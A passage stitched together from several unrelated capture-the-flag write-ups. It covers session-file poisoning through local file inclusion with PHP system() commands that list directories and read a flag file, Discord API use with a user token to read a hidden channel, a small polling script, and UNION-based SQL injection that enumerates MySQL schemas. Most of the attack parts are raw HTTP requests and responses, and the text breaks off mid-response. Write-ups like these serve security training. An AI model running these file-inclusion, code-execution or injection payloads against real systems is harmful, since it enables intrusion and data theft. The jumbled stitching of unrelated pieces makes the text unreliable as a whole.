<html> <head> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"> </head> <body> Hello, beemovie.txthello.txtpi.txt </body></html>```
And then use LFI to execute it.
```GET /index.php?file=../../../../../../proc/self/fd/9 HTTP/1.1Host: filestorage.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeReferer: http://filestorage.tamuctf.com/index.phpCookie: PHPSESSID=boig3tsj1931578ghio3a9fderUpgrade-Insecure-Requests: 1
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Fri, 20 Mar 2020 02:07:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 431Connection: closeX-Powered-By: PHP/7.3.15Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache
<html> <head> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"> </head> <body> ? Go backname|s:22:"uid=100(apache) gid=101(apache) groups=82(www-data),101(apache),101(apache)"; </body></html>```
You can enumerate the folder with the following HTTP requests.
```POST /index.php HTTP/1.1Host: filestorage.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 55Origin: http://filestorage.tamuctf.comConnection: closeReferer: http://filestorage.tamuctf.com/index.phpCookie: PHPSESSID=11fcvj19chosurikvujm4639cqUpgrade-Insecure-Requests: 1
name=%3C%3Fphp%20system%28%27ls%20-al%27%29%3B%20%3F%3E
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Fri, 20 Mar 2020 02:18:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 565Connection: closeX-Powered-By: PHP/7.3.15Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache
<html> <head> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"> </head> <body> Hello, beemovie.txthello.txtpi.txt </body></html>
GET /index.php?file=../../../../../../proc/self/fd/9 HTTP/1.1Host: filestorage.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeReferer: http://filestorage.tamuctf.com/index.phpCookie: PHPSESSID=11fcvj19chosurikvujm4639cqUpgrade-Insecure-Requests: 1
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Fri, 20 Mar 2020 02:18:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 681Connection: closeX-Powered-By: PHP/7.3.15Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache
<html> <head> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"> </head> <body> ? Go backname|s:26:"total 20drwxr-xr-x 1 root root 4096 Mar 20 01:23 .drwxr-xr-x 1 root root 4096 Mar 18 17:38 ..drwxr-xr-x 2 root root 4096 Mar 18 17:38 files-rw-r--r-- 1 root root 45 Aug 16 2019 index.html-rw-rw-r-- 1 root root 1141 Mar 20 01:22 index.php"; </body></html>```
You can now enumerate the root folder.
```POST /index.php HTTP/1.1Host: filestorage.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 61Origin: http://filestorage.tamuctf.comConnection: closeReferer: http://filestorage.tamuctf.com/index.phpCookie: PHPSESSID=11fcvj19chosurikvujm4639cqUpgrade-Insecure-Requests: 1
name=%3C%3Fphp%20system%28%27ls%20-al%20%2F%27%29%3B%20%3F%3E
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Fri, 20 Mar 2020 02:29:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 567Connection: closeX-Powered-By: PHP/7.3.15Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache
<html> <head> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"> </head> <body> Hello, beemovie.txthello.txtpi.txt </body></html>
GET /index.php?file=../../../../../../proc/self/fd/9 HTTP/1.1Host: filestorage.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeReferer: http://filestorage.tamuctf.com/index.phpCookie: PHPSESSID=11fcvj19chosurikvujm4639cqUpgrade-Insecure-Requests: 1
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Fri, 20 Mar 2020 02:29:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 1731Connection: closeX-Powered-By: PHP/7.3.15Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache
<html> <head> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"> </head> <body> ? Go backname|s:28:"total 244drwxr-xr-x 1 root root 4096 Mar 20 01:55 .drwxr-xr-x 1 root root 4096 Mar 20 01:55 ..-rwxr-xr-x 1 root root 0 Mar 20 01:55 .dockerenvdrwxr-xr-x 2 root root 4096 Jan 16 21:52 bindrwxr-xr-x 5 root root 340 Mar 20 01:55 devdrwxr-xr-x 1 root root 4096 Mar 20 01:55 etcdrwxr-xr-x 1 root root 4096 Mar 20 01:23 flag_is_heredrwxr-xr-x 2 root root 4096 Jan 16 21:52 homedrwxr-xr-x 1 root root 4096 Mar 18 17:38 libdrwxr-xr-x 5 root root 4096 Jan 16 21:52 mediadrwxr-xr-x 2 root root 4096 Jan 16 21:52 mntdrwxr-xr-x 2 root root 4096 Jan 16 21:52 optdr-xr-xr-x 504 root root 0 Mar 20 01:55 procdrwx------ 2 root root 4096 Jan 16 21:52 rootdrwxr-xr-x 1 root root 4096 Mar 18 17:38 rundrwxr-xr-x 2 root root 4096 Jan 16 21:52 sbindrwxr-xr-x 2 root root 4096 Jan 16 21:52 srv-rw-rw-r-- 1 root root 36 Mar 18 17:37 start.shdr-xr-xr-x 13 root root 0 Mar 20 01:16 sysdrwxrwxrwt 1 root root 167936 Mar 20 02:29 tmpdrwxr-xr-x 1 root root 4096 Jan 16 21:52 usrdrwxr-xr-x 1 root root 4096 Mar 18 17:38 var"; </body></html>```
So you can discover the `/flag_is_here` folder and enumerate it.
```POST /index.php HTTP/1.1Host: filestorage.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 73Origin: http://filestorage.tamuctf.comConnection: closeReferer: http://filestorage.tamuctf.com/index.phpCookie: PHPSESSID=11fcvj19chosurikvujm4639cqUpgrade-Insecure-Requests: 1
name=%3C%3Fphp%20system%28%27ls%20-al%20%2Fflag_is_here%27%29%3B%20%3F%3E
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Fri, 20 Mar 2020 02:31:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 579Connection: closeX-Powered-By: PHP/7.3.15Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache
<html> <head> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"> </head> <body> Hello, beemovie.txthello.txtpi.txt </body></html>
GET /index.php?file=../../../../../../proc/self/fd/9 HTTP/1.1Host: filestorage.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeReferer: http://filestorage.tamuctf.com/index.phpCookie: PHPSESSID=11fcvj19chosurikvujm4639cqUpgrade-Insecure-Requests: 1
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Fri, 20 Mar 2020 02:31:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 549Connection: closeX-Powered-By: PHP/7.3.15Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache
<html> <head> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"> </head> <body> ? Go backname|s:40:"total 12drwxr-xr-x 1 root root 4096 Mar 20 01:23 .drwxr-xr-x 1 root root 4096 Mar 20 01:55 ..-rw-rw-r-- 1 root root 29 Mar 18 17:37 flag.txt"; </body></html>```
And finally print `/flag_is_here/flag.txt` file.
```POST /index.php HTTP/1.1Host: filestorage.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 76Origin: http://filestorage.tamuctf.comConnection: closeReferer: http://filestorage.tamuctf.com/index.phpCookie: PHPSESSID=11fcvj19chosurikvujm4639cqUpgrade-Insecure-Requests: 1
name=%3C%3Fphp%20system%28%27cat%20%2Fflag_is_here%2Fflag.txt%27%29%20%3F%3E
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Fri, 20 Mar 2020 02:33:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 584Connection: closeX-Powered-By: PHP/7.3.15Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache
<html> <head> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"> </head> <body> Hello, beemovie.txthello.txtpi.txt </body></html>
GET /index.php?file=../../../../../../proc/self/fd/9 HTTP/1.1Host: filestorage.tamuctf.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeReferer: http://filestorage.tamuctf.com/index.phpCookie: PHPSESSID=11fcvj19chosurikvujm4639cqUpgrade-Insecure-Requests: 1
HTTP/1.1 200 OKServer: nginx/1.16.1Date: Fri, 20 Mar 2020 02:33:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 384Connection: closeX-Powered-By: PHP/7.3.15Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cache
<html> <head> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous"> </head> <body> ? Go backname|s:45:"gigem{535510n_f1l3_p0150n1n6}"; </body></html>```
So the flag is the following.
```gigem{535510n_f1l3_p0150n1n6}``` |
# Against the Perfect discord Inquisitor 1, 2
### Prompt 1
You're on a journey and come to the Tavern of a Kingdom Enemy, you need to get information of a secret organization for the next quest. Be careful about the Inquisitor! He can ban you from this world.
TL;DR find the flag
[Kingdom Chall](https://discord.gg/fHHyU6g)
HINT: Title/Chall name
### Prompt 2
There is a mage in the tavern that reveals secrets from the place. He is friendly, so he can help you! Be careful about the Inquisitor! He can ban you from this world.
TL;DR use the bot to get the flag
[Kingdom Chall](https://discord.gg/fHHyU6g)
### Solution 1
Starting out, we clicked the link to [Kingdom Chall](https://discord.gg/fHHyU6g), and joined the discord. There, we identified a long stream of other people joining, as well as a bot account named `Gandalf`. `Gandalf`'s status reads:
> You're welcome~ Free reveals with command: $reveal_secret (channel.id) (message.id)
Obviously, we need to test this:
```lyellread$reveal_secret 688190172793536545 691089964401819759Gandalf [BOT]@everyone say hello to @Gandalf !```
Great! Looks like `Gandalf` will be our oracle for any messages that we have ID's for but cannot read ourselves. What's next?
Someone had a plugin enabled that saw there was a hidden channel on the Discord, with ID `688190289814618213`, with name `hidden-round-table`. We would have found this in our API search below, but this helped refine where we were headed wiht `Gandalf` and the API.
Now onto that hint: The challenge name is "Against the Perfect discord Inquisitor" - that makes acronym "API"... I know where this is going. We need to make some API request to get some information.
After quite a bit of looking (Discord, your docs suck big time!!), we came up with [this script](discord_bot.py) which will make a `GET` request to the API. We needed a token, too, and thankfully, GitHub user Tyrrrz provides [this guide](https://github.com/Tyrrrz/DiscordChatExporter/wiki/Obtaining-Token-and-Channel-IDs) to getting tokens and channel (and message and guild) ID's. Now we can work with that. We tried:- `/api/v6/channel/688190172793536545/messages`: returns all the messages - nothing new, as we can read all messages in that channel.- `/api/v6/channel/688190289814618213/messages`: returns not authorized to view messages in hidden channel - no suprise there.- `/api/v6/guilds/688190172793536536`: returns much of what we already knew about this guild- `/api/v6/guilds/688190172793536536/channels`: ```json[{"id": "688190172793536539", "type": 4, "name": "Kingdom", "position": 0, "parent_id": null, "guild_id": "688190172793536536", "permission_overwrites": [], "nsfw": false}, {"id": "688190172793536545", "last_message_id": "691368465201758319", "type": 0, "name": "tavern", "position": 0, "parent_id": "688190172793536539", "topic": "A place of business where people gather to drink alcoholic beverages and be served food, and in most cases, where travelers receive lodging.", "guild_id": "688190172793536536", "permission_overwrites": [{"id": "688190172793536536", "type": "role", "allow": 0, "deny": 2048}], "nsfw": false, "rate_limit_per_user": 0},
{"id": "688190289814618213", "last_message_id": "688214063595258088", "type": 0, "name": "hidden-round-table", "position": 1, "parent_id": "688190172793536539", "topic": "F#{The_Table_of_King_Arthur}", "guild_id": "688190172793536536", "permission_overwrites": [{"id": "688190172793536536", "type": "role", "allow": 0, "deny": 3072}, {"id": "688190424124227590", "type": "role", "allow": 3072, "deny": 0}], "nsfw": false, "rate_limit_per_user": 0}]```
That's the first flag! `F#{The_Table_of_King_Arthur}` - the description of `#hidden_round_table`! Now onto the next one...
### Solution 2
We have not even used `Gandalf` yet, so we will need to. The output above tells us something interesting (and exactly what we need to use `Gandalf`) - the last message id in `#hidden_round_table`: `688214063595258088`. Now we can ask our "Mage" `Gandalf` about this:
```lyellread$reveal_secret 688190289814618213 688214063595258088Gandalf [BOT] RiN7UzRiM1JfMTVfVGgzX0sxbmdfQXJ0aHVyfQ==```
That looks like base64... One sec, [we can fix that](https://www.base64decode.org/), and we get `F#{S4b3R_15_Th3_K1ng_Arthur}`!
Thank you Fireshell Team and @K4L1!!
~Lyell Read, Phillip Mestas, Robert Detjens |
```#!/usr/bin/pythonimport urllib
link = "http://challs.xmas.htsp.ro:1341/"var = 1while var == 1 : f = urllib.urlopen(link) myfile = f.read() if myfile.find("X-MAS"): print(myfile)```
#X-MAS{stay_at_home_and_respect_your_elders} |
# b01lers CTF 2020 – Life on Mars
* **Category:** web* **Points:** 100
## Challenge
> We earth men have a talent for ruining big, beautiful things.> > http://web.ctf.b01lers.com:1001/
## Solution
The left menu of the webpage is made up of items calling `get_life()` JavaScript method contained into `http://web.ctf.b01lers.com:1001/static/js/life_on_mars.js` file.
```javascriptfunction get_life(query) { //jquery ajax for querying server /* response = $.load('/query?search=' + query, function(responseTxt, statusTxt, xhr).parseJSON(response); { if (statusTxt == "success") {
} });
*/ //alert(query); $.ajax({ type: "GET", url: "/query?search=" + query, data: "{}", contentType: "application/json; charset=utf-8", dataType: "json", cache: false, success: function(data) { var table_html = '<table id="results"><tr><th>Name</th><th>Description</th></tr>'; $.each(data, function(i, item) { table_html += "<tr><td>" + data[i][0] + "</td><td>" + data[i][1] + "</td></tr>"; }); table_html += "</table>";
$("#results").replaceWith(table_html); },
error: function(msg) { //alert(msg.responseText); } });}```
This method receives a string in input and uses it to contact a remote service, i.e. `http://web.ctf.b01lers.com:1001/query?search=<param>` endpoint, where requests are done to retrieve data.
The remote service is vulnerable to SQL injection.
```GET /query?search=amazonis_planitia%20UNION%20SELECT%201%2C%202&{}&_=1584147989793 HTTP/1.1Host: web.ctf.b01lers.com:1001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestConnection: closeReferer: http://web.ctf.b01lers.com:1001/
HTTP/1.0 200 OKContent-Type: application/jsonContent-Length: 4336Server: Werkzeug/1.0.0 Python/3.7.3Date: Sun, 15 Mar 2020 13:24:28 GMT
[["Advent","Humanoid"],["Aras",""],["Arburian Pelarota","Functionally extinct due to the destruction of their home planet Arburia, they are bulky yellow aliens that can curl into a ball, much like apillbug, and are very hard to damage in ball form, and they use this to crush enemies either by bouncing around or rolling over them"],["Baalols",""],["Bailies","Machine race that conquered Earth"],["Beings of the Extra Terrestrial origin which is Adversary of human race",""],["Brain Dogs",""],["Brikar",""],["Briori",""],["Cthulhi",""],["Daxamites","Humanoid"],["Deep Ones","Fish-like humanoids who serve and worship the Great Old Ones known as Father Dagon and Mother Hydra."],["Defiance","band of many different races"],["Delvians","Humanoid - Similar to humans in appearance, but evolved from plants. Blue, bald, sensitive to sunlight, procreate through air-borne spores."],["Demiurg",""],["Denobulans","Humanoid"],["Dom Kavash",""],["Doog","Reptiloid with canine features. Extremely dull-witted."],["Dremer",""],["Elgyem","Maintain Halo Rings, but are not officially part of the Covenant. Large, pink, squid like creatures. No real threat to Humanity other than maintaining the Halo Rings, whicharea threat to humanity."],["Eywa",""],["Festival","An evil race of bugs that live in the Firebug hive inside of the Lavarynth."],["Gashlai","Gaseous humanoids, they can either exist in gaseous mediums (such as gas pipes in Victorian Households) or inside the corpses of others."],["G'keks",""],["Gnaar",""],["Gowachin",""],["Grendarl","Intelligent bipedal species known for their scavenging, hoarding, and trading. Though not a violently aggressive species they are very fond of human blood."],["Gretchin",""],["Grogs","Humanoid"],["Hoix",""],["Hooloovoo","Ape-like reptilian carnivores"],["Hoon",""],["Jem'Hadar",""],["Jotoki","Their skin is dull yellow, with light brown markings and have beady eyes. Only male Joozians have been shown."],["Kafers","Humanoid"],["Kig-yar",""],["Knnn",""],["Lance Corporal Dororo",""],["Leerans",""],["Liir","Gelatinous, shapeshifting creatures, they are carnivorous in nature, more specifically preying on elderly humans. They are fond of high levels of heat, but are weak to and deathly afraid of water."],["Little Guys",""],["Macra","Saber Tyrant"],["Merseians","millipede-like"],["Micronoids",""],["Mon Calamari",""],["Moroks",""],["Mutons",""],["Nemet","Humanoid, completely grey."],["Nicassar",""],["Ood",""],["Orandoans","Humanoid, Ascended to a higher plain of existence in non-corporial form"],["Overlords",""],["P'lod",""],["Polymorph",""],["The Prin","Humanoid; formidable ancient race of mysterious origin; reside primarily on Phase World, center of the Three Galaxies; possess phase powers, enabling manipulation of physical and dimensional space; generally indifferent to anything that does not pose a threat to themselves or the cosmos as a whole."],["Q",""],["Remans",""],["Rodians","Humanoid"],["Sathar",""],["Scrin","Humanoid. Genetically engineered offshoot of humans, harvested from Earth 27,000 years ago. Lower heat resistance than humans, but double the average life expectancy"],["S\u00e9roni","Arachnid, capable of phase-shifting to turn invisible"],["Shevar",""],["Silicoids",""],["Skedar","Sessile, plant-like beings mounted in personal mechanical vehicles (skrodes)"],["Skinnies",""],["Slylandro","Humanoid"],["Snovemdomas",""],["Species",""],["Syreen","Humanoid"],["Tavleks",""],["Aaamazzarite","City-sized alien spaceship. Nickname given by Cassie Sullivan. They created a series of waves to wipe out humanity and invade Earth."],["Titanide",""],["Traskans","Compare with the earlierflat catsfromRobert A. Heinlein'sThe Rolling Stones."],["Vorcarian bloodtracker",""],["Xel'Naga",""],["Yanme'e","Slug-like parasites. They need a host to see, walk, and communicate, and are the main antagonists of the Animorphs series, intent on enslaving other species."],["Yridian","Alternative name for the humanoidIridonianrace whose most distinctive feature is the array of small horns on top of their heads. Their home planet isIridonia, though they have established many colonies on planets throughout the galaxy.[1]The most well known member isDarth Maul."],["1","2"]]```
At this point, you can discover that the used DBMS is MySQL version 5.7.29.
```GET /query?search=amazonis_planitia%20union%20select%20%40%40version%2C%201&{}&_=1584147989793 HTTP/1.1Host: web.ctf.b01lers.com:1001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestConnection: closeReferer: http://web.ctf.b01lers.com:1001/
HTTP/1.0 200 OKContent-Type: application/jsonContent-Length: 4341Server: Werkzeug/1.0.0 Python/3.7.3Date: Sun, 15 Mar 2020 13:30:32 GMT
[["Advent","Humanoid"],["Aras",""],["Arburian Pelarota","Functionally extinct due to the destruction of their home planet Arburia, they are bulky yellow aliens that can curl into a ball, much like apillbug, and are very hard to damage in ball form, and they use this to crush enemies either by bouncing around or rolling over them"],["Baalols",""],["Bailies","Machine race that conquered Earth"],["Beings of the Extra Terrestrial origin which is Adversary of human race",""],["Brain Dogs",""],["Brikar",""],["Briori",""],["Cthulhi",""],["Daxamites","Humanoid"],["Deep Ones","Fish-like humanoids who serve and worship the Great Old Ones known as Father Dagon and Mother Hydra."],["Defiance","band of many different races"],["Delvians","Humanoid - Similar to humans in appearance, but evolved from plants. Blue, bald, sensitive to sunlight, procreate through air-borne spores."],["Demiurg",""],["Denobulans","Humanoid"],["Dom Kavash",""],["Doog","Reptiloid with canine features. Extremely dull-witted."],["Dremer",""],["Elgyem","Maintain Halo Rings, but are not officially part of the Covenant. Large, pink, squid like creatures. No real threat to Humanity other than maintaining the Halo Rings, whicharea threat to humanity."],["Eywa",""],["Festival","An evil race of bugs that live in the Firebug hive inside of the Lavarynth."],["Gashlai","Gaseous humanoids, they can either exist in gaseous mediums (such as gas pipes in Victorian Households) or inside the corpses of others."],["G'keks",""],["Gnaar",""],["Gowachin",""],["Grendarl","Intelligent bipedal species known for their scavenging, hoarding, and trading. Though not a violently aggressive species they are very fond of human blood."],["Gretchin",""],["Grogs","Humanoid"],["Hoix",""],["Hooloovoo","Ape-like reptilian carnivores"],["Hoon",""],["Jem'Hadar",""],["Jotoki","Their skin is dull yellow, with light brown markings and have beady eyes. Only male Joozians have been shown."],["Kafers","Humanoid"],["Kig-yar",""],["Knnn",""],["Lance Corporal Dororo",""],["Leerans",""],["Liir","Gelatinous, shapeshifting creatures, they are carnivorous in nature, more specifically preying on elderly humans. They are fond of high levels of heat, but are weak to and deathly afraid of water."],["Little Guys",""],["Macra","Saber Tyrant"],["Merseians","millipede-like"],["Micronoids",""],["Mon Calamari",""],["Moroks",""],["Mutons",""],["Nemet","Humanoid, completely grey."],["Nicassar",""],["Ood",""],["Orandoans","Humanoid, Ascended to a higher plain of existence in non-corporial form"],["Overlords",""],["P'lod",""],["Polymorph",""],["The Prin","Humanoid; formidable ancient race of mysterious origin; reside primarily on Phase World, center of the Three Galaxies; possess phase powers, enabling manipulation of physical and dimensional space; generally indifferent to anything that does not pose a threat to themselves or the cosmos as a whole."],["Q",""],["Remans",""],["Rodians","Humanoid"],["Sathar",""],["Scrin","Humanoid. Genetically engineered offshoot of humans, harvested from Earth 27,000 years ago. Lower heat resistance than humans, but double the average life expectancy"],["S\u00e9roni","Arachnid, capable of phase-shifting to turn invisible"],["Shevar",""],["Silicoids",""],["Skedar","Sessile, plant-like beings mounted in personal mechanical vehicles (skrodes)"],["Skinnies",""],["Slylandro","Humanoid"],["Snovemdomas",""],["Species",""],["Syreen","Humanoid"],["Tavleks",""],["Aaamazzarite","City-sized alien spaceship. Nickname given by Cassie Sullivan. They created a series of waves to wipe out humanity and invade Earth."],["Titanide",""],["Traskans","Compare with the earlierflat catsfromRobert A. Heinlein'sThe Rolling Stones."],["Vorcarian bloodtracker",""],["Xel'Naga",""],["Yanme'e","Slug-like parasites. They need a host to see, walk, and communicate, and are the main antagonists of the Animorphs series, intent on enslaving other species."],["Yridian","Alternative name for the humanoidIridonianrace whose most distinctive feature is the array of small horns on top of their heads. Their home planet isIridonia, though they have established many colonies on planets throughout the galaxy.[1]The most well known member isDarth Maul."],["5.7.29","1"]]```
Database schemas can be read.
```GET /query?search=amazonis_planitia%20UNION%20SELECT%20schema_name%2C%201%20FROM%20information_schema.schemata&{}&_=1584147989793 HTTP/1.1Host: web.ctf.b01lers.com:1001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestConnection: closeReferer: http://web.ctf.b01lers.com:1001/
HTTP/1.0 200 OKContent-Type: application/jsonContent-Length: 4387Server: Werkzeug/1.0.0 Python/3.7.3Date: Sun, 15 Mar 2020 13:38:09 GMT
[["Advent","Humanoid"],["Aras",""],["Arburian Pelarota","Functionally extinct due to the destruction of their home planet Arburia, they are bulky yellow aliens that can curl into a ball, much like apillbug, and are very hard to damage in ball form, and they use this to crush enemies either by bouncing around or rolling over them"],["Baalols",""],["Bailies","Machine race that conquered Earth"],["Beings of the Extra Terrestrial origin which is Adversary of human race",""],["Brain Dogs",""],["Brikar",""],["Briori",""],["Cthulhi",""],["Daxamites","Humanoid"],["Deep Ones","Fish-like humanoids who serve and worship the Great Old Ones known as Father Dagon and Mother Hydra."],["Defiance","band of many different races"],["Delvians","Humanoid - Similar to humans in appearance, but evolved from plants. Blue, bald, sensitive to sunlight, procreate through air-borne spores."],["Demiurg",""],["Denobulans","Humanoid"],["Dom Kavash",""],["Doog","Reptiloid with canine features. Extremely dull-witted."],["Dremer",""],["Elgyem","Maintain Halo Rings, but are not officially part of the Covenant. Large, pink, squid like creatures. No real threat to Humanity other than maintaining the Halo Rings, whicharea threat to humanity."],["Eywa",""],["Festival","An evil race of bugs that live in the Firebug hive inside of the Lavarynth."],["Gashlai","Gaseous humanoids, they can either exist in gaseous mediums (such as gas pipes in Victorian Households) or inside the corpses of others."],["G'keks",""],["Gnaar",""],["Gowachin",""],["Grendarl","Intelligent bipedal species known for their scavenging, hoarding, and trading. Though not a violently aggressive species they are very fond of human blood."],["Gretchin",""],["Grogs","Humanoid"],["Hoix",""],["Hooloovoo","Ape-like reptilian carnivores"],["Hoon",""],["Jem'Hadar",""],["Jotoki","Their skin is dull yellow, with light brown markings and have beady eyes. Only male Joozians have been shown."],["Kafers","Humanoid"],["Kig-yar",""],["Knnn",""],["Lance Corporal Dororo",""],["Leerans",""],["Liir","Gelatinous, shapeshifting creatures, they are carnivorous in nature, 